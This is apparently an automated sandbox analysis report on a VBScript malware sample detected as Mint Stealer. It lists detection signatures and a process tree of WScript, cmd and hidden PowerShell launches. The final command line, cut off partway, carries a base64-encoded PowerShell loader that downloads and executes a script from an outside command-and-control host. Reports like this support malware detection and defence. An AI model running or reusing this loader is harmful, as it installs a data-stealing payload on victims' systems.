Windows
Analysis Report
Fattura (5).vbs
Overview
General Information
Detection
Mint Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Found suspicious powershell code related to unpacking or dynamic code loading
Queries Google from non browser process on port 80
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7520 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Fattu ra (5).vbs " MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 7920 cmdline:
powershell -executio npolicy by pass -Wind owStyle hi dden -c "c md /q /cC: \Users\use r\AppData\ Roaming\eG snEKfw.bat " MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 8080 cmdline:
"C:\Window s\system32 \cmd.exe" /q /cC:\Us ers\user\A ppData\Roa ming\eGsnE Kfw.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) powershell.exe (PID: 8096 cmdline:
powershell -executio npolicy by pass -Wind owStyle hi dden -file "C:\Users \user\AppD ata\Roamin g\eGsnEKfw .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) powershell.exe (PID: 8176 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -Windo wStyle hid den -c "[S ystem.Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g('JEVycm9 yQWN0aW9uU HJlZmVyZW5 jZSA9ICJDb 250aW51ZSI KCiRrMnNoS 1Y5b2JZaTV VV3VSVFFMT 2l0bWFnM2p iID0gJCgta m9pbiAoKDY 1Li45MCkgK yAoOTcuLjE yMikgfCBHZ XQtUmFuZG9 tIC1Db3Vud CA1IHwgJSB 7W2NoYXJdJ F99KSk7CiR SM1RZMGF2M 3dGR2l2Ym1 jSnE4QUViS Th1eVhkZEd oWDNBNjIzM U5nVTdFekh yc0s3dXVQI D0gW2ludF0 oR2V0LURhd GUgLUZvcm1 hdCBISCk7C iRtRTdWT1l mTnlnbnp3S U5BU005WkF xVUtvbmtlM VJQMnhVb1p RdVRGcXhIc WE2bXVjakJ jTHIgPSBba W50XShHZXQ tRGF0ZSAtR m9ybWF0IG1 tKTsKJG1FN 1ZPWWZOeWd uendJTkFTT TlaQXFVS29 ua2UxUlAye FVvWlF1VEZ xeEhxYTZtd WNqQmNMckF kZCA9IDM7C klmICgkbUU 3Vk9ZZk55Z 256d0lOQVN NOVpBcVVLb 25rZTFSUDJ 4VW9aUXVUR nF4SHFhNm1 1Y2pCY0xyI CsgJG1FN1Z PWWZOeWdue ndJTkFTTTl aQXFVS29ua 2UxUlAyeFV vWlF1VEZxe EhxYTZtdWN qQmNMckFkZ CAtZ3QgNTk pIHsKICAgI CRSM1RZMGF 2M3dGR2l2Y m1jSnE4QUV iSTh1eVhkZ EdoWDNBNjI zMU5nVTdFe khyc0s3dXV QID0gJFIzV FkwYXYzd0Z HaXZibWNKc ThBRWJJOHV 5WGRkR2hYM 0E2MjMxTmd VN0V6SHJzS zd1dVAgKyA xOwogICAgJ G1FN1ZPWWZ OeWduendJT kFTTTlaQXF VS29ua2UxU lAyeFVvWlF 1VEZxeEhxY TZtdWNqQmN MciA9ICRtR TdWT1lmTnl nbnp3SU5BU 005WkFxVUt vbmtlMVJQM nhVb1pRdVR GcXhIcWE2b XVjakJjTHI gKyAkbUU3V k9ZZk55Z25 6d0lOQVNNO VpBcVVLb25 rZTFSUDJ4V W9aUXVURnF 4SHFhNm11Y 2pCY0xyQWR kIC0gNjA7C n0gRWxzZSB 7CiAgICAkb UU3Vk9ZZk5 5Z256d0lOQ VNNOVpBcVV Lb25rZTFSU DJ4VW9aUXV URnF4SHFhN m11Y2pCY0x yID0gJG1FN 1ZPWWZOeWd uendJTkFTT TlaQXFVS29 ua2UxUlAye FVvWlF1VEZ xeEhxYTZtd WNqQmNMciA rICRtRTdWT 1lmTnlnbnp 3SU5BU005W kFxVUtvbmt lMVJQMnhVb 1pRdVRGcXh IcWE2bXVja kJjTHJBZGQ 7Cn07CiRSM 1RZMGF2M3d GR2l2Ym1jS nE4QUViSTh 1eVhkZEdoW DNBNjIzMU5 nVTdFekhyc 0s3dXVQID0 gSWYgKFtpb nRdKEdldC1 EYXRlIC1Gb 3JtYXQgSEg pICsgMSAtZ 3QgMjMpIHs iMDAifSBFb HNlIHskUjN UWTBhdjN3R kdpdmJtY0p xOEFFYkk4d XlYZGRHaFg zQTYyMzFOZ 1U3RXpIcnN LN3V1UH07C iRndERRODJ OZjhVeWwwU nJlYTNqNW9 BSTRTS053N nBoOVZmd0t TVnpucEFqN UNhdVBsZDd pZ2xia1lpZ 1cgPSAkKC1 qb2luICgoN jUuLjkwKSA rICg5Ny4uM TIyKSB8IEd ldC1SYW5kb 20gLUNvdW5 0IDEyIHwgJ SB7W2NoYXJ dJF99KSk7C iRyZ2VUNEt CeHhLdUdnY UExdjVzd3l wID0gQCIKJ EVycm9yQWN 0aW9uUHJlZ mVyZW5jZSA 9ICJDb250a W51ZSIKY3V ybCAtdXNlY iAiaHR0cDo vL3JpZ3p1d nppM2JuejM udG9wLzEuc GhwP3M9bWl udHMxMyIgf CBpZXg7ClJ lbW92ZS1Jd GVtICJDOlx Vc2Vyc1xQd WJsaWNcRG9 jdW1lbnRzX CQoJGd0RFE 4Mk5mOFV5b DBScmVhM2o 1b0FJNFNLT nc2cGg5VmZ 3S1NWem5wQ Wo1Q2F1UGx kN2lnbGJrW WlnVykucHM xIiAtRm9yY 2UgCiJAOwo KInBvd2Vyc 2hlbGwgLW5 vcHJvZmlsZ SAtZXhlY3V 0aW9ucG9sa WN5IGJ5cGF zcyAtV2luZ G93U3R5bGU gaGlkZGVuI C1jICQoJHJ nZVQ0S0J4e Et1R2dhQTF 2NXN3eXApI iB8IE91dC1 GaWxlIC1Ga WxlUGF0aCA iQzpcVXNlc nNcUHVibGl jXERvY3VtZ